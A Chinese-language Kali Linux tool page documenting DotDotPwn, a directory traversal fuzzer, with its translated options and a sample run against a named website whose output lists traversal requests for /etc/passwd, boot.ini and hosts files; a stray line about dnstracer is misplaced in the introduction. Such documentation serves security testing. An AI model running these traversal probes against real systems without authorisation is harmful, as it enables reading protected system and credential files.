---
工具名稱: DotDotPwn
所屬分類: Information Gathering
標簽: [kali linux,dotdotpwn,information gathering,recon,http,exploitation tools]
創建時間: 2016-10-22 14:00:00
---
0x00 DotDotPwn介紹
-------------
DotDotPwn是一個非常靈活的智能模糊器,用于發現軟件中的遍歷目錄漏洞,例如HTTP/FTP/TFTP服務器,Web平臺的應用程序(如CMS,ERP,博客等)。
此外,它有一個獨立于協議的模塊,用于將所需的有效負載發送到指定的主機和端口。 另一方面,它也可以使用STDOUT模塊以腳本方式使用。
DotDotPwn是用perl編程語言編寫的,可以在* NIX或Windows平臺下運行,它是BackTrack Linux(BT4 R2)中包含的第一個墨西哥人開發的工具。
此版本支持的模糊模塊:
dnstracer用于獲取給定主機名從給定域名服務器(DNS)的信息,并跟隨DNS服務器鏈得到權威結果。
```plain
HTTP
HTTP URL
FTP
TFTP
Payload (Protocol independent)
STDOUT
```
工具來源:https://github.com/wireghoul/dotdotpwn
[DotDotPwn主頁][1] | [Kali DotDotPwn Repo倉庫][2]
- 作者:chr1x, nitr0us
- 證書:GPLv2
0x01 DotDotPwn功能
---------------
dotdotpwn.pl - DotDotPwn - 目錄遍歷模糊器
```shell
root@kali:~# dotdotpwn
#################################################################################
# #
# CubilFelino Chatsubo #
# Security Research Lab and [(in)Security Dark] Labs #
# chr1x.sectester.net chatsubo-labs.blogspot.com #
# #
# pr0udly present: #
# #
# ________ __ ________ __ __________ #
# \______ \ ____ _/ |_\______ \ ____ _/ |_\______ \__ _ __ ____ #
# | | \ / _ \\ __\| | \ / _ \\ __\| ___/\ \/ \/ // \ #
# | ` \( <_> )| | | ` \( <_> )| | | | \ /| | \ #
# /_______ / \____/ |__| /_______ / \____/ |__| |____| \/\_/ |___| / #
# \/ \/ \/ #
# - DotDotPwn v3.0 - #
# The Directory Traversal Fuzzer #
# http://dotdotpwn.sectester.net #
# dotdotpwn@sectester.net #
# #
# by chr1x & nitr0us #
#################################################################################
用法: ./dotdotpwn.pl -m <模塊> -h <主機名> [選項]
可用選項:
-m 模塊 [http | http-url | ftp | tftp | payload | stdout]
-h 主機名
-O 智能模糊探測操作系統 (nmap模塊)
-o 操作系統類型已知("windows", "unix" 或者 "generic")
-s 服務版本檢測(banner信息抓取)
-d 遍歷深度 (e.g. 深度3為 ../../../; 默認: 6)
-f 特定文件名(例如/etc/motd; 默認:根據檢測到的操作系統設置,配置文件TraversalEngine.pm)
-E 向TraversalEngine.pm添加 @Extra_files文件(例如:web.config, httpd.conf等)
-S 使用SSL - 對于HTTP和Payload模塊(在http-uri的url中使用https://)
-u 要標記網址中遍歷的部分(例如:http://foo:8080/id.php?x=TRAVERSAL&y=31337)
-k 要在響應中匹配的文字模式(http-url和載荷模塊 - 例如,如果嘗試/etc/passwd,則需要root權限)
-p 要發送的有效負載的文件名和要進行模糊處理的部分用TRAVERSAL關鍵字標記
-x 連接端口 (默認: HTTP=80; FTP=21; TFTP=69)
-t 每次測試之間的時間(毫秒,默認: 300 )
-X 一旦發現漏洞,使用二分法算法檢測確切的深度
-e 附加在每個fuzz字符串末尾的文件擴展名 (例如: ".php", ".jpg", ".inc")
-U 用戶名 (默認: 'anonymous')
-P 密碼 (默認: 'dot@dot.pwn')
-M HTTP使用'http'模塊時請求方式[GET | POST | HEAD | COPY | MOVE] (default: GET)
-r 報告文件名 (默認: 'HOST_MM-DD-YYYY_HOUR-MIN.txt')
-b 在找到第一個漏洞后中斷
-q 安靜模式(不打印每次嘗試)
-C 如果未從主機接收到數據則繼續
```
<!--more-->
0x02 DotDotPwn用法示例
-----------------
```shell
root@kali:~# dotdotpwn -m http -O -s -S -h www.hackfun.org
#################################################################################
# #
# CubilFelino Chatsubo #
# Security Research Lab and [(in)Security Dark] Labs #
# chr1x.sectester.net chatsubo-labs.blogspot.com #
# #
# pr0udly present: #
# #
# ________ __ ________ __ __________ #
# \______ \ ____ _/ |_\______ \ ____ _/ |_\______ \__ _ __ ____ #
# | | \ / _ \\ __\| | \ / _ \\ __\| ___/\ \/ \/ // \ #
# | ` \( <_> )| | | ` \( <_> )| | | | \ /| | \ #
# /_______ / \____/ |__| /_______ / \____/ |__| |____| \/\_/ |___| / #
# \/ \/ \/ #
# - DotDotPwn v3.0 - #
# The Directory Traversal Fuzzer #
# http://dotdotpwn.sectester.net #
# dotdotpwn@sectester.net #
# #
# by chr1x & nitr0us #
#################################################################################
[+] Report name: Reports/www.hackfun.org_10-23-2016_23-42.txt
[========== TARGET INFORMATION ==========]
[+] Hostname: www.hackfun.org
[+] Detecting Operating System (nmap) ...
[+] Operating System detected:
[+] Protocol: http
[+] Port: 443
[+] Service detected:
nginx
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (generic)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 19680
[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../etc/passwd
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../etc/issue
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../boot.ini
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../etc/passwd
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../etc/issue
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../boot.ini
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../etc/passwd
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../etc/issue
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../boot.ini
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../etc/passwd
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../etc/issue
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../boot.ini
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../etc/passwd
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../etc/issue
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../boot.ini
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../../etc/passwd
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../../etc/issue
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../../boot.ini
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../../windows/system32/drivers/etc/hosts
...
...
```
[1]: http://dotdotpwn.blogspot.ca/
[2]: http://git.kali.org/gitweb/?p=packages/dotdotpwn.git;a=summary
- Information Gathering
- acccheck
- ace-voip
- Amap
- Automater
- bing-ip2hosts
- braa
- CaseFile
- CDPSnarf
- cisco-torch
- Cookie Cadger
- copy-router-config
- DMitry
- dnmap
- dnsenum
- dnsmap
- DNSRecon
- dnstracer
- dnswalk
- DotDotPwn
- enum4linux
- enumIAX
- Fierce
- Firewalk
- fragroute
- fragrouter
- Ghost Phisher
- GoLismero
- goofile
- hping3
- InTrace
- iSMTP
- lbd
- Maltego Teeth
- masscan
- Metagoofil
- Miranda
- nbtscan-unixwiz
- Nmap
- ntop
- p0f
- Parsero
- Recon-ng
- SET
- smtp-user-enum
- snmp-check
- sslcaudit
- SSLsplit
- sslstrip
- SSLyze
- THC-IPV6
- theHarvester
- TLSSLed
- twofi
- URLCrazy
- Wireshark
- WOL-E
- Xplico
- Vulnerability Analysis
- BBQSQL
- BED
- cisco-auditing-tool
- cisco-global-exploiter
- cisco-ocs
- cisco-torch
- copy-router-config
- Doona
- Exploitation Tools
- Wireless Attacks
- Ghost-Phisher
- mfoc
- Forensics Tools
- Binwalk
- bulk-extractor
- Web Applications
- apache-users
- BurpSuite
- sqlmap
- w3af
- Sniffing-Spoofing
- Bettercap
- Burp Suite
- DNSChef
- Fiked
- hamster-sidejack
- HexInject
- Password Attacks
- crunch
- hashcat
- John the Ripper
- Johnny
- Hardware Hacking
- android-sdk
- apktool
- Arduino
- dex2jar
- Sakis3G
- Reverse Engineering
- apktool